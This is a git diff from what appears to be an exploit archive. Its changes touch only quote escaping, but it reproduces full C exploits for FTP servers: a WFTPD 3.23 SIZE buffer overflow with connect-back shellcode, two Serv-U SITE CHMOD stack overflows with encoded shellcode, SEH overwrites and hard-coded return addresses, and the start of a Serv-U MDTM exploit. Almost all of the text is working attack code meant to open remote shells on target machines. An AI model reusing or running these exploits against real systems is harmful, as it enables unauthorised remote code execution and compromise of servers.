-\"\\xf9\\x08\\x19\\xc7\\x96\\x11\\x79\\xd1\\x3d\\x24\\x19\\x99\\x58\\x21\\x52\\x01\"
-\"\\x1a\\x94\\x52\\xec\\xb1\\xd1\\x58\\x95\\xb7\\xd2\\x79\\x6c\\x8d\\x44\\xb6\\xb0\"
-\"\\xc3\\xf5\\x19\\xc7\\x92\\x11\\x79\\xfe\\x3d\\x1c\\xd9\\x13\\xe9\\x0c\\x93\\x73\"
-\"\\xb5\\x3c\\x19\\x11\\xda\\x34\\x8e\\xf9\\x75\\x21\\x49\\xfc\\x3d\\x53\\xa2\\x13\"
-\"\\xf6\\x1c\\x19\\xe8\\xaa\\xbd\\x19\\xd8\\xbe\\x4e\\xfa\\x16\\xf8\\x1e\\x7e\\xc8\"
-\"\\x49\\xc6\\xf4\\xcb\\xd0\\x78\\xa1\\xaa\\xde\\x67\\xe1\\xaa\\xe9\\x44\\x6d\\x48\"
-\"\\xde\\xdb\\x7f\\x64\\x8d\\x40\\x6d\\x4e\\xe9\\x99\\x77\\xfe\\x37\\xfd\\x9a\\x9a\"
-\"\\xe3\\x7a\\x90\\x67\\x66\\x78\\x4b\\x91\\x43\\xbd\\xc5\\x67\\x60\\x43\\xc1\\xcb\"
-\"\\xe5\\x53\\xc1\\xdb\\xe5\\xef\\x42\\xf0\\xb6\\x10\\x92\\x98\\xd0\\x78\\x92\\x98\"
-\"\\xd0\\x43\\x1b\\x79\\x23\\x78\\x7e\\x61\\x1c\\x70\\xc5\\x67\\x60\\x7a\\x82\\xc9\"
-\"\\xe3\\xef\\x42\\xfe\\xdc\\x74\\xf4\\xf0\\xd5\\x7d\\xf8\\xc8\\xef\\x39\\x5e\\x11\"
-\"\\x51\\x7a\\xd6\\x11\\x54\\x21\\x52\\x6b\\x1c\\x85\\x1b\\x65\\x48\\x52\\xbf\\x66\"
-\"\\xf4\\x3c\\x1f\\xe2\\x8e\\xbb\\x39\\x33\\xde\\x62\\x6c\\x2b\\xa0\\xef\\xe7\\xb0\"
-\"\\x49\\xc6\\xc9\\xcf\\xe4\\x41\\xc3\\xc9\\xdc\\x11\\xc3\\xc9\\xe3\\x41\\x6d\\x48\"
-\"\\xde\\xbd\\x4b\\x9d\\x78\\x43\\x6d\\x4e\\xdc\\xef\\x6d\\xaf\\x49\\xc0\\xfa\\x7f\"
-\"\\xcf\\xd6\\xeb\\x67\\xc3\\x14\\x6d\\x4e\\x49\\x67\\x6e\\x67\\x66\\x78\\x62\\x12\"
-\"\\xb2\\x4f\\xc1\\x67\\x60\\xef\\x42\\x98\";
+"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"
+"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"
+"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"
+"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"
+"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"
+"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"
+"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"
+"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"
+"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"
+"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"
+"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"
+"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"
+"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"
+"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"
+"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"
+"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"
+"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"
+"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"
+"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"
+"\xb2\x4f\xc1\x67\x60\xef\x42\x98";
 
 void config_shellcode(unsigned long ip, unsigned short port)
   {
@@ -78,22 +78,22 @@ struct hostent *he;
 struct sockaddr_in client;
 WSADATA wsa;
 
-printf(\"\\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\\n\");
-printf(\"[*] coded by h07 <h07@interia.pl>\\n\");  
+printf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
+printf("[*] coded by h07 <h07@interia.pl>\n");  
 
 if(argc < 8)
   {
-  printf(\"[*] usage:..\\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\\n\\n\", argv[0]);
-  printf(\"[*] ID list:\\n\");
-  printf(\"[>] 0: XP SP2 polish\\n\");
-  printf(\"[>] 1: 2000 SP4 polish\\n\");
-  printf(\"[>] 2: XP SP2 english\\n\");
-  printf(\"[>] 3: 2000 SP4 english\\n\");
-  printf(\"[>] 4: XP SP2 german\\n\\n\");
-  printf(\"[*] opt - WFTPD option \'restrict to home directory and below\'\\n\");
-  printf(\"[>] 0: disabled\\n\");
-  printf(\"[>] 1: enabled\\n\\n\");
-  printf(\"[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\\n\\n\", argv[0]);
+  printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
+  printf("[*] ID list:\n");
+  printf("[>] 0: XP SP2 polish\n");
+  printf("[>] 1: 2000 SP4 polish\n");
+  printf("[>] 2: XP SP2 english\n");
+  printf("[>] 3: 2000 SP4 english\n");
+  printf("[>] 4: XP SP2 german\n\n");
+  printf("[*] opt - WFTPD option 'restrict to home directory and below'\n");
+  printf("[>] 0: disabled\n");
+  printf("[>] 1: enabled\n\n");
+  printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
   exit(0);   
   } 
 
@@ -104,13 +104,13 @@ opt = atoi(argv[2]);
 
 if((id > 4) || (id < 0))
   {
-  printf(\"[-] ID error: unknown target\\n\");
+  printf("[-] ID error: unknown target\n");
   exit(-1);     
   }  
   
 if((opt > 1) || (opt < 0))
   {
-  printf(\"[-] opt error: unknown option\\n\");
+  printf("[-] opt error: unknown option\n");
   exit(-1);      
   }          
   
@@ -123,7 +123,7 @@ sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 
 if((he = gethostbyname(argv[3])) == NULL)
   {
-  printf(\"[-] Unable to resolve\\n\");
+  printf("[-] Unable to resolve\n");
   exit(-1); 
   }
  
@@ -133,7 +133,7 @@ client.sin_family = AF_INET;
 
 if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
   {
-  printf(\"[-] error: connect()\\n\");
+  printf("[-] error: connect()\n");
   exit(-1);
   }
 
@@ -141,35 +141,35 @@ recv(sock, buffer, BUFF_SIZE -1, 0);
 
 //USER
 memset(buffer, 0, BUFF_SIZE);
-sprintf(buffer, \"USER %s\\r\\n\", argv[4]);
+sprintf(buffer, "USER %s\r\n", argv[4]);
 send(sock, buffer, strlen(buffer), 0);  
 recv(sock, buffer, BUFF_SIZE -1, 0);
-printf(\"[*] FTP response: %s\", buffer);
+printf("[*] FTP response: %s", buffer);
 
 //PASS
 memset(buffer, 0, BUFF_SIZE);
-sprintf(buffer, \"PASS %s\\r\\n\", argv[5]);
+sprintf(buffer, "PASS %s\r\n", argv[5]);
 send(sock, buffer, strlen(buffer), 0);  
 recv(sock, buffer, BUFF_SIZE -1, 0);
-printf(\"[*] FTP response: %s\", buffer);
+printf("[*] FTP response: %s", buffer);
 
-if(strstr(buffer, \"530\") != 0) exit(-1);
+if(strstr(buffer, "530") != 0) exit(-1);
 
 //SIZE
 memset(buffer, 0x90, BUFF_SIZE);
-memcpy(buffer, \"SIZE \", 5);
+memcpy(buffer, "SIZE ", 5);
 
 switch(opt)
   {
   case 0:
     { 
-    memcpy(buffer + 5, \"/\", 1);
+    memcpy(buffer + 5, "/", 1);
     r_len = 531;
     break;
     }
   case 1: 
     {
-    memcpy(buffer + 5, \"//\", 2);
+    memcpy(buffer + 5, "//", 2);
     r_len = 532;
     break;
     }                  
@@ -177,15 +177,15 @@ switch(opt)
 
 memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);          
 *((unsigned long*)(&buffer[r_len])) = eip;
-memcpy(buffer + (r_len + 4), \"\\r\\n\\x00\", 3);
+memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
 
 
 if(send(sock, buffer, strlen(buffer), 0) != -1)
-  printf(\"[+] sending buffer: ok\\n\");
+  printf("[+] sending buffer: ok\n");
   else
-  printf(\"[-] sending buffer: failed\\n\");
+  printf("[-] sending buffer: failed\n");
     
-printf(\"[*] press enter to quit\\n\");
+printf("[*] press enter to quit\n");
 getchar();    
 }
 
diff --git a/platforms/windows/remote/23591.c b/platforms/windows/remote/23591.c
index f96a1c59b..057696db0 100755
--- a/platforms/windows/remote/23591.c
+++ b/platforms/windows/remote/23591.c
@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/9483/info
 
-RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a \'site chmod\' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
+RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
 
 /*
 software:       Serv-U 4.1.0.0
@@ -41,21 +41,21 @@ unsigned char sc[]={
 0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
 };
 
-char *user=\"anonymous\";
-char *pass=\"not@for.you\";
-char *path=\"/incoming\";
+char *user="anonymous";
+char *pass="not@for.you";
+char *path="/incoming";
 
 void usage(char *argv0) {
-        printf(\"usage: %s -d <ip_dest> [options]\\n\",argv0);
-        printf(\"options:\\n\");
-        printf(\" -d target ip\\n\");
-        printf(\" -p target port (default 21)\\n\");
-        printf(\" -u username to log with (default %s)\\n\",user);
-        printf(\" -s password to log with (default %s)\\n\",pass);
-        printf(\" -w writable directory (default %s)\\n\",path);
-        printf(\" -H listening host (default 127.0.0.1)\\n\");
-        printf(\" -P listening port on host (default 80)\\n\");
-        printf(\"\\n\");
+        printf("usage: %s -d <ip_dest> [options]\n",argv0);
+        printf("options:\n");
+        printf(" -d target ip\n");
+        printf(" -p target port (default 21)\n");
+        printf(" -u username to log with (default %s)\n",user);
+        printf(" -s password to log with (default %s)\n",pass);
+        printf(" -w writable directory (default %s)\n",path);
+        printf(" -H listening host (default 127.0.0.1)\n");
+        printf(" -P listening port on host (default 80)\n");
+        printf("\n");
         exit(1);
 }
 
@@ -69,35 +69,35 @@ int main(int argc, char **argv) {
 
         int delta=423;
         int callebx=0x10077A92; // libeay32.dll
-        char jmpback[]=\"\\xe9\\xff\\xfe\\xff\\xff\\xeb\\xf9\\x90\\x90\"; // jmp -256
-        char chmod[]=\"SITE CHMOD 777 \";
+        char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
+        char chmod[]="SITE CHMOD 777 ";
 
-        printf(\"[%%]   Serv-u v4.1.0.0 sploit by mandragore\\n\");
+        printf("[%%]   Serv-u v4.1.0.0 sploit by mandragore\n");
 
         if (argc<2)
                 usage(argv[0]);
 
-        while((i = getopt(argc, argv, \"d:p:u:s:w:H:P:\"))!= EOF) {
+        while((i = getopt(argc, argv, "d:p:u:s:w:H:P:"))!= EOF) {
                 switch (i) {
-                case \'d\':
+                case 'd':
                         target=inet_addr(optarg);
                         break;
-                case \'p\':
+                case 'p':
                         port=atoi(optarg);
                         break;
-                case \'u\':
+                case 'u':
                         user=optarg;
                         break;
-                case \'s\':
+                case 's':
                         pass=optarg;
                         break;
-                case \'w\':
+                case 'w':
                         path=optarg;
                         break;
-                case \'H\':
+                case 'H':
                         lhost=inet_addr(optarg);
                         break;
-                case \'P\':
+                case 'P':
                         lport=atoi(optarg);
                         break;
                 default:
@@ -109,9 +109,9 @@ int main(int argc, char **argv) {
         if ((target==-1) || (lhost==-1))
                 usage(argv[0]);
 
-        printf(\"[.] if working you\'ll have a shell on %s:%d.\\n\", \\
+        printf("[.] if working you'll have a shell on %s:%d.\n", \
                 inet_ntoa(*(struct in_addr *)&lhost),lport);
-        printf(\"[.] launching attack on ftp://%s:%s@%s:%d%s\\n\", \\
+        printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
                 user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
 
         lport=lport ^ 0x9696;
@@ -131,54 +131,54 @@ int main(int argc, char **argv) {
 
         ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
         if (ret==-1)
-                fatal(\"[-] connect()\");
+                fatal("[-] connect()");
 
         ret=recv(s,buff,4095,0);
         memset(buff+ret,0,1);
-        printf(\"%s\",buff);
+        printf("%s",buff);
         
-        sprintf(buff,\"USER %s\\r\\n\",user);
-        printf(\"%s\",buff);
+        sprintf(buff,"USER %s\r\n",user);
+        printf("%s",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf(\"%s\",buff);
+        printf("%s",buff);
         
-        sprintf(buff,\"PASS %s\\r\\n\",pass);
-        printf(\"%s\",buff);
+        sprintf(buff,"PASS %s\r\n",pass);
+        printf("%s",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf(\"%s\",buff);
+        printf("%s",buff);
 
-        if (strstr(buff,\"230\")==0) { 
-                printf(\"[-] bad login/pass combinaison\\n\"); 
+        if (strstr(buff,"230")==0) { 
+                printf("[-] bad login/pass combinaison\n"); 
                 exit(1); 
         }
 
-        sprintf(buff,\"CWD %s\\r\\n\",path);
-        printf(\"%s\",buff);
+        sprintf(buff,"CWD %s\r\n",path);
+        printf("%s",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf(\"%s\",buff);
+        printf("%s",buff);
 
         // verify directory
-        sprintf(buff,\"PWD\\r\\n\",path);
+        sprintf(buff,"PWD\r\n",path);
         send(s,buff,strlen(buff),0);
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        i=strstr(buff+5,\"\\x22\")-buff-5;
+        i=strstr(buff+5,"\x22")-buff-5;
         if (i!=1) i++;  // trailing /
 
-        printf(\"[+] sending exploit..\\n\");
+        printf("[+] sending exploit..\n");
 
         bzero(buff,4096);
         memset(buff,0x90,600);
-        strcat(buff,\"\\r\\n\");
+        strcat(buff,"\r\n");
         delta-=i; // strlen(path);
         memcpy(buff,&chmod,strlen(chmod));
         memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
@@ -189,13 +189,13 @@ int main(int argc, char **argv) {
         
         ret=recv(s,buff,1024,0);
         if ((ret==0) || (ret==-1))
-                fatal(\"[-] ret()\");
+                fatal("[-] ret()");
         memset(buff+ret,0,1);
-        printf(\"%s\",buff);
+        printf("%s",buff);
 
         close(s);
 
-        printf(\"[+] done.\\n\");
+        printf("[+] done.\n");
 
         exit(0);
 }
diff --git a/platforms/windows/remote/23592.c b/platforms/windows/remote/23592.c
index c88cae038..661fe80a3 100755
--- a/platforms/windows/remote/23592.c
+++ b/platforms/windows/remote/23592.c
@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/9483/info
  
-RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a \'site chmod\' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
+RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
 
 /*
 * serv-u 4.2 site chmod long_file_name stack overflow exp
@@ -14,8 +14,8 @@ RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue
 #include <winsock2.h>
 #include <stdio.h>
 
-#define CHMOD_CMD \"SITE CHMOD 0666 \"
-#define ERR_HEADER \"550 /\"
+#define CHMOD_CMD "SITE CHMOD 0666 "
+#define ERR_HEADER "550 /"
 #define SEH_STACK_POSITION 0x54
 #define BUF_STACK_POSITION 0x1ec
 #define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION - 
@@ -28,45 +28,45 @@ strlen(ERR_HEADER))
 //0x0A code removed from shellcode
 unsigned char bdshellcode[] =
 // decode
-\"\\xEB\\x10\\x5f\\x4f\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0f\\x99\\xE2\\xFA\"
-\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
+"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
+"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
 // shellcode
-\"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
-\"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
-\"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
-\"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
-\"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
-\"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
-\"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
-\"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
-\"\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\\xF3\\x9B\"
-\"\\x66\\xCE\\x75\\x12\\x41\\x5E\\x9E\\x9B\\x99\\x99\\xAC\\xAA\\x59\\x10\\xDE\\x9D\"
-\"\\xF3\\x89\\xCE\\xCA\\x66\\xCE\\x69\\xF3\\x98\\xCA\\x66\\xCE\\x6D\\xC9\\xC9\\xCA\"
-\"\\x66\\xCE\\x61\\x12\\x49\\x1A\\x75\\xDD\\x12\\x6D\\xAA\\x59\\xF3\\x89\\xC0\\x10\"
-\"\\x9D\\x17\\x7B\\x62\\x10\\xCF\\xA1\\x10\\xCF\\xA5\\x10\\xCF\\xD9\\xFF\\x5E\\xDF\"
-\"\\xB5\\x98\\x98\\x14\\xDE\\x89\\xC9\\xCF\\xAA\\x50\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\"
-\"\\xC8\\x5E\\xDE\\xA5\\xFA\\xF4\\xFD\\x99\\x14\\xDE\\xA5\\xC9\\xC8\\x66\\xCE\\x79\"
-\"\\xCB\\x66\\xCE\\x65\\xCA\\x66\\xCE\\x65\\xC9\\x66\\xCE\\x7D\\xAA\\x59\\x35\\x1C\"
-\"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
-\"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
-\"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
-\"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
-\"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
-\"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
-\"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
-\"\\x99\\xFA\\xF5\\xF6\\xEA\\xFC\\xEA\\xF6\\xFA\\xF2\\xFC\\xED\\x99\";
+"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
+"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
+"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
+"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
+"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
+"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
+"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
+"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
+"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
+"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
+"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
+"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
+"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
+"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
+"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
+"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
+"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
+"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
+"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
+"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
+"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
+"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
+"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
+"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
 
 //unsigned long jmp_esp = 0x77f4144b;
 //unsigned long jmp_ebx = 0x77a5211b;
 //unsigned long call_ebx = 0x750219d6; //use this one
 
 unsigned char evil_chmod[5000];
-unsigned char seh[] = \"\\xeb\\x06\\x90\\x90\" //jmp below
-                     \"\\xd6\\x19\\x02\\x75\" //call_ebx = 0x750219d6
-                     \"\\x33\\xc0\"         //below: xor eax, eax
-                     \"\\xb0\\x1c\"         //mov al, 1c
-                     \"\\x03\\xd8\"         //add ebx, eax
-                     \"\\xc6\\x03\\x90\";    //mov byte ptr [ebx], 90
+unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
+                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
+                     "\x33\xc0"         //below: xor eax, eax
+                     "\xb0\x1c"         //mov al, 1c
+                     "\x03\xd8"         //add ebx, eax
+                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90
 
 
 int main(int argc, char **argv)
@@ -78,15 +78,15 @@ int main(int argc, char **argv)
   unsigned long     ip;
   unsigned char buf[100];
 
-  printf(\"*******************************************\\n\");
-  printf(\"* Serv-U 4.2 site chmod stack overflow exp*\\n\");
-  printf(\"* Vul discovered by kkqq@0x557.org        *\\n\");
-  printf(\"* Coded by mslug@safechina.net            *\\n\");
-  printf(\"*******************************************\\n\");
-  printf(\"\\n\");
+  printf("*******************************************\n");
+  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
+  printf("* Vul discovered by kkqq@0x557.org        *\n");
+  printf("* Coded by mslug@safechina.net            *\n");
+  printf("*******************************************\n");
+  printf("\n");
 
   if(argc<6) {
-     printf(\"serv.exe <host> <port> <user> <password> <path>\\n\");
+     printf("serv.exe <host> <port> <user> <password> <path>\n");
      return 0;
   }
 
@@ -98,36 +98,36 @@ int main(int argc, char **argv)
 
   ftpsock = connect_tcp(argv[1], atoi(argv[2]));
   if(ftpsock < 0) {
-     printf(\"[-] Connection refused\\n\");
+     printf("[-] Connection refused\n");
      return 0;
   }
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
 
   recv_buf[ret] = 0;
-  printf(\"%s\", recv_buf);
+  printf("%s", recv_buf);
 
 
-  sprintf(buf, \"USER %s\\r\\n\", argv[3]);
+  sprintf(buf, "USER %s\r\n", argv[3]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
 
   recv_buf[ret] = 0;
-  printf(\"%s\", recv_buf);
+  printf("%s", recv_buf);
 
-  sprintf(buf, \"PASS %s\\r\\n\", argv[4]);
+  sprintf(buf, "PASS %s\r\n", argv[4]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
-  printf(\"%s\", recv_buf);
+  printf("%s", recv_buf);
 
-  sprintf(buf, \"CWD %s\\r\\n\", argv[5]);
+  sprintf(buf, "CWD %s\r\n", argv[5]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
-  printf(\"%s\", recv_buf);
+  printf("%s", recv_buf);
 
   memset(evil_chmod, 0x90, sizeof(evil_chmod));
   memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
@@ -137,8 +137,8 @@ bdshellcode, strlen(bdshellcode));
 
   send(ftpsock, evil_chmod, strlen(evil_chmod), 0);
 
-  printf(\"[+] Shellcode sent\\n\");
-  printf(\"[+] Now nc to port 53\\n\");
+  printf("[+] Shellcode sent\n");
+  printf("[+] Now nc to port 53\n");
 
   closesocket(ftpsock);
   WSACleanup();
diff --git a/platforms/windows/remote/23763.c b/platforms/windows/remote/23763.c
index 38b0d434c..6dff1a87f 100755
--- a/platforms/windows/remote/23763.c
+++ b/platforms/windows/remote/23763.c
@@ -7,7 +7,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 /*
 *-----------------------------------------------------------------------
 *
-* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x \"MDTM\" Command
+* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
 * Remote stack buffer overflow exploit
 *
 * Copyright (C) 2004 HUC All Rights Reserved.
@@ -19,12 +19,12 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 * Update   : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug.
 *          : 2004-02-17 v7.0 Add Download url file and exec shellcode.
 *          : 2004-02-04 v6.1 Modified to work with UNIX.
-*          : 2004-02-01 v6.0 Change decode and target, change \'jmp(call) ebx\' addr to \'pop,pop,ret\' addr, can attack winXP and win2003 now.
+*          : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.
